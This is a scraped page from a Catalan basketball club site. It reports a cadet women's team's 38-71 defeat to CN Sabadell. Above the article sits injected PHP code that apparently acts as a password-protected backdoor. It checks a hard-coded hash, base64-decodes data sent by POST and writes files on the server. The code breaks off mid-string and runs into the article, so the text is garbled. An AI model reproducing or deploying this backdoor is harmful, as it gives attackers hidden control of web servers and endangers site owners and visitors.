function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 05 A comet massa errades i no pot amb el potencial del CN Sabadell (38-71) - Tgn Bàsquet Club -

El Cadet femení 05 A comet massa errades i no pot amb el potencial del CN Sabadell (38-71)

Updated: març 13, 2021

El Cadet femení 05 A ha encaixat la segona derrota de la temporada de la lliga de Preferent A. El conjunt lila ha estat víctima del seu mal inici, on ha comès moltes errades i ha anat a remolc d’un equip, el CN Sabadell, que ja era favorit abans de començar el matx. Les noies que entrena Albert del Rey han intentat plantar cara, però contra un rival més poderós físicament han patit de valent.

El marcador ha tardat molt a moure’s a favor de qualsevol dels dos equips i, de fet, en el minut 5 de partit el resultat era de 0-5. Les locals les han vist quadrades durant gran part de la primera meitat. El demèrit ha estat, en grau considerable, per culpa de la bona defensa de les visitants, que han imprès un ritme alt des de bon començament, amb una defensa pressionant que ha provocat moltes pèrdues per les tarragonines (10-19 al final del 1Q). Però les liles han estat francament desencertades en el tir exterior i només la inspiració de Farell ha permès les locals anotar amb una certa regularitat (24-39 al descans).

La defensa del TGN Bàsquet, que havia estat a bon nivell en els primers vint minuts, ha millorat en la segona meitat i, de fet, el tercer quart ha estat més igualat (10-10 de parcial). Amb tot, la falta de punteria i les pèrdues de pilota han condemnat el TGN Bàsquet a una derrota clara contra un adversari que en l’últim període ha mostrat tot el seu potencial (4-22 de parcial, primera cistella local en aquest període a 1:40 del final).